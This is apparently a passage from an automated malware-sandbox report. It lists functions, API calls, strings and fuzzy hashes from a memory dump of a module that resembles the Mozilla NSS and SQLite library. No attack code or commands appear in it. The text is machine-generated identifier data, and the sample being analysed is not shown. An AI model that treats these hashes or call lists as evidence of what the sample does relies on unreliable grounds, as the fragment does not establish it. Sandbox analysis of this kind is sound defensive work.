Part of subcall function 6CEE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE88298,?,?,?,6CE7FCE5,?), ref: 6CEE07BF
Part of subcall function 6CEE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEE07E6
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE081B
Part of subcall function 6CEE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEA7DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CEA7F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6CEA7F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CEA7F98
PK11_FreeSymKey.NSS3(?), ref: 6CEA7FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEA7FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CEA8000

Part of subcall function 6CEC9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CEA7F0C,?,00000000,00000000,00000000,?), ref: 6CEC943B
Part of subcall function 6CEC9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CEC946B
Part of subcall function 6CEC9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CEC9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEA8110
PK11_FreeSymKey.NSS3(00000000), ref: 6CEA811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CEA822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CEA823C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: f5e1ac792ef77377e7d90bba7ec2d844b2bbf4dd0910a3a7bffe6a1760a35602
Instruction ID: 9190e79903c2fa1b332bc64b61aab91e47cde060d16d88cfc7c8e85829f91352
Opcode Fuzzy Hash: f5e1ac792ef77377e7d90bba7ec2d844b2bbf4dd0910a3a7bffe6a1760a35602
Instruction Fuzzy Hash: 2EC172B1D402599FEB21CF54CC40FEAB7B8AF15348F1081E9E91DAA641E7319E86CF61

Function 6CEB0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CEB0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CEB0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CEB1006
PK11_FreeSymKey.NSS3(?), ref: 6CEB101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEB1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEB103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CEB1048
memcpy.VCRUNTIME140(?,?,?), ref: 6CEB108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CEB10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CEB10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CEB112E

Part of subcall function 6CEB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CEB08C4,?,?), ref: 6CEB15B8
Part of subcall function 6CEB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CEB08C4,?,?), ref: 6CEB15C1
Part of subcall function 6CEB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEB162E
Part of subcall function 6CEB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEB1637

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: c0b9fdc064fa8e7c2287da8cd585aaa0a8cdb386439cb735516a69a4067b029c
Instruction ID: b8e6bcac1ce5f7e7432c4eb298fbae7c90442d8aa8598a5d9b58dec199ddd277
Opcode Fuzzy Hash: c0b9fdc064fa8e7c2287da8cd585aaa0a8cdb386439cb735516a69a4067b029c
Instruction Fuzzy Hash: 2471C0B1A002058FDB00CFA5CE85A7AB7B5BF4832CF24862DE919A7711E731E955CB91

Function 6CED1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6CED1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CED2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CED228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CED23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CED241C

Strings

token, xrefs: 6CED1F2C
serial, xrefs: 6CED22A2
model, xrefs: 6CED23CB, 6CED23EC
manufacturer, xrefs: 6CED2179

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: fb9534245fd3fd6da3ac24d8e97ac817308955b915cc91af1be04ff0aafb5ac8
Instruction ID: c8390acd1a9cf2658046d9d40e0b5ee943254923d03e3457932bdf18f376087e
Opcode Fuzzy Hash: fb9534245fd3fd6da3ac24d8e97ac817308955b915cc91af1be04ff0aafb5ac8
Instruction Fuzzy Hash: D0022062D0CBC96EF7318271C44D3D76AF09B5632CF2E166DC59E467C3C3A8698A8352

Function 6CED6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE81C6F,00000000,00000004,?,?), ref: 6CED6C3F

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CE81C6F,00000000,00000004,?,?), ref: 6CED6C60
PR_ExplodeTime.NSS3(00000000,6CE81C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CE81C6F,00000000,00000004,?,?), ref: 6CED6C94

Strings

gfff, xrefs: 6CED6CFD
gfff, xrefs: 6CED6CF5
gfff, xrefs: 6CED6D30
gfff, xrefs: 6CED6D66
gfff, xrefs: 6CED6D9C

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 9bcdf2201249cfc5434aeb669922cc9b83564c59ab58a0188eca14653151ca03
Instruction ID: e921fe151fe1209cd7c9b081d1d745894c67103891903363791cca58fb3dbe3a
Opcode Fuzzy Hash: 9bcdf2201249cfc5434aeb669922cc9b83564c59ab58a0188eca14653151ca03
Instruction Fuzzy Hash: 13514B72B015494FC708CDADDC526DABBEAABA4310F48C23AE441DB781D638E907C751

Function 6CF50F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CF51027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF510B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF51353

Strings

$, xrefs: 6CF512A0
'%.*q', xrefs: 6CF51217, 6CF51292
%lld, xrefs: 6CF5114B
%02x, xrefs: 6CF512F6
zeroblob(%d), xrefs: 6CF51223
NULL, xrefs: 6CF5119E
-- , xrefs: 6CF50FF5

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 044ad06080bc521819cdb8b0dbbf1879f1e949da3a18c4149c83f925d69feaf7
Instruction ID: f7d952efcc0583defd0706b0351aa2eb592edd625f5d810b97bfeb0ce7a0ce2d
Opcode Fuzzy Hash: 044ad06080bc521819cdb8b0dbbf1879f1e949da3a18c4149c83f925d69feaf7
Instruction Fuzzy Hash: ABE1DF71A083409FD710CF18C480B6BBBF5AF95348F95896DEA8587B11E771F859CB82

Function 6CF58FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF58FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF590DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF59118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF5915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF591C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF59209

Strings

UUUU, xrefs: 6CF59255
3333, xrefs: 6CF5925E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 45154f6e47b2e32cac846983b35b7159e291a94f06b8934bad55f18a92997135
Instruction ID: 9756e9afe28c23c8c6fd25489411e0cefe87c3ad2cbba028a3dd44e05b0040b9
Opcode Fuzzy Hash: 45154f6e47b2e32cac846983b35b7159e291a94f06b8934bad55f18a92997135
Instruction Fuzzy Hash: B9A1A1B2E001159BDB08CB68CC80B9EB7B5BF48324F494539EA15A7741EB36ED12CBD0

Function 6CE10FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CE0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CE6F9C9,?,6CE6F4DA,6CE6F9C9,?,?,6CE3369A), ref: 6CE0CA7A
Part of subcall function 6CE0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CE0CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CE1103E
EnterCriticalSection.KERNEL32(?), ref: 6CE11139
LeaveCriticalSection.KERNEL32(?), ref: 6CE11190
sqlite3_free.NSS3(00000000), ref: 6CE11227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CE1126E
sqlite3_free.NSS3(?), ref: 6CE1127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CE11267
winAccess, xrefs: 6CE1129B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 394e5208ba3606e2c6f9fe578d775ba47b6705f71fc4690b6abd1cad557eeee1
Instruction ID: d456525b9452552e7ca141c1db933bbc911f3a04be0cb0f863cf1b56b0b56ef6
Opcode Fuzzy Hash: 394e5208ba3606e2c6f9fe578d775ba47b6705f71fc4690b6abd1cad557eeee1
Instruction Fuzzy Hash: 85711732F082119BEB449FB5DC85B6E7776FB97328F240629E91187E80DB30E911C792

Function 6CE1AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31,?,?,?,?,?,?,?), ref: 6CE1B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31), ref: 6CE1B090
sqlite3_free.NSS3(?,?,?,?,?,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31), ref: 6CE1B0A2
CloseHandle.KERNEL32(?,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31,?,?,?,?,?,?,?,?,?), ref: 6CE1B100
sqlite3_free.NSS3(?,?,00000002,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31,?,?,?,?,?,?,?), ref: 6CE1B115
sqlite3_free.NSS3(?,?,?,?,?,?,6CF3CF46,?,6CE0CDBD,?,6CF3BF31), ref: 6CE1B12D

Part of subcall function 6CE09EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE1C6FD,?,?,?,?,6CE6F965,00000000), ref: 6CE09F0E
Part of subcall function 6CE09EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CE6F965,00000000), ref: 6CE09F5D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 8166ac5ad92e8c5f4b242fdec1fead80ef81322e9143bb696b129c16b2a3fe24
Instruction ID: b5335a7eca812b3fe0f3c718753a33c31533a318563fdf8a2adde5125ddb66a6
Opcode Fuzzy Hash: 8166ac5ad92e8c5f4b242fdec1fead80ef81322e9143bb696b129c16b2a3fe24
Instruction Fuzzy Hash: 7491C0B1E082058FDB54DF74C885B7AB7B2BF49308F25462DE41697B50EB30E865CB51

Function 6CEEBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CEEBD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CEEBD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CEEBD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CEEBD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CEEBDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CEEBDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CEEBDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CEEBE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CEEBE1E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 65bd3d9d9eaf06f32eb8da46dab9f61b2e10bff7280f43df66c21eba15d80b23
Instruction ID: 7cf0bda97a11fcaa5da24598e3854d94bec3ae3619858e07aaf1795692c2a35c
Opcode Fuzzy Hash: 65bd3d9d9eaf06f32eb8da46dab9f61b2e10bff7280f43df66c21eba15d80b23
Instruction Fuzzy Hash: AD219377E0439D97FB004A96BC42B8B32789BD97CDF180118E916EE741E711941886AA

Function 6CF98D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CFE14E4,6CF4CC70), ref: 6CF98D47
PR_GetCurrentThread.NSS3 ref: 6CF98D98

Part of subcall function 6CE70F00: PR_GetPageSize.NSS3(6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F1B
Part of subcall function 6CE70F00: PR_NewLogModule.NSS3(clock,6CE70936,FFFFE8AE,?,6CE016B7,00000000,?,6CE70936,00000000,?,6CE0204A), ref: 6CE70F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CF98E7B
htons.WSOCK32(?), ref: 6CF98EDB
PR_GetCurrentThread.NSS3 ref: 6CF98F99
PR_GetCurrentThread.NSS3 ref: 6CF9910A

Strings

%u.%u.%u.%u, xrefs: 6CF98E74

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 144420754b70a34731440cd6effb575de2a302d37126ae9c8454d10eea5e0582
Instruction ID: 60ce360aa88e8c4a60d75348e6be8ace475b1c663145a11cb78b914c31b78ecc
Opcode Fuzzy Hash: 144420754b70a34731440cd6effb575de2a302d37126ae9c8454d10eea5e0582
Instruction Fuzzy Hash: 19028C319052518FEF18CF19C4647AABBB2EF42308F1B825ED8955BA91C735DA85C790

Function 6CE1EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

view, xrefs: 6CE1F061, 6CE1F071, 6CE1FAB7
temporary table name must be unqualified, xrefs: 6CE1F734
sqlite_temp_master, xrefs: 6CE1F0A6, 6CE1F2D5
there is already an index named %s, xrefs: 6CE1F9D7
%s %T already exists, xrefs: 6CE1FAC8
table, xrefs: 6CE1F05C, 6CE1FABC, 6CE1FAC7
authorizer malfunction, xrefs: 6CE1F95C, 6CE1F9BF, 6CE1FA5E, 6CE1FA8B
sqlite_master, xrefs: 6CE1F0AB, 6CE1F2DA, 6CE1F757, 6CE1F93E
not authorized, xrefs: 6CE1F957, 6CE1F9BA

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 96515878dfca8c6bd64ac206a73c28a3b48660b7acc705c4a089fd404ec79161
Instruction ID: 82d0cc4abf516fc181f76f9a274008b2740f33a8047d4529c0fe367a0df2f6d4
Opcode Fuzzy Hash: 96515878dfca8c6bd64ac206a73c28a3b48660b7acc705c4a089fd404ec79161
Instruction Fuzzy Hash: 0172B370E082058FDB14CF69C484BA9BBF1BF49318F2481ADD8159BB52D779E866CBD0

Function 6CF39C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6CE0C52B), ref: 6CF39D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3A114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF3A01F, 6CF3A0E4, 6CF3A0FE
database corruption, xrefs: 6CF3A029, 6CF3A108
%s at line %d of [%.10s], xrefs: 6CF3A02E, 6CF3A10D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: ec7cb472db9451f66bfa8748c9c4295b5a54d8972ac3a7e61a012742b0c4a22e
Instruction ID: 1ada87107cb6ac10d09798d04f076b08e2e45840d30ede3e3ab2d634829f0b8e
Opcode Fuzzy Hash: ec7cb472db9451f66bfa8748c9c4295b5a54d8972ac3a7e61a012742b0c4a22e
Instruction Fuzzy Hash: 7E22CE7160C361AFCB04CF6AC49062BB7E1BF8A344F149A2DE8DE97641DB35D945CB82

Function 6CF59D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CE18637,?,?), ref: 6CF59E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CE18637), ref: 6CF59ED6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF59EC0
database corruption, xrefs: 6CF59ECA
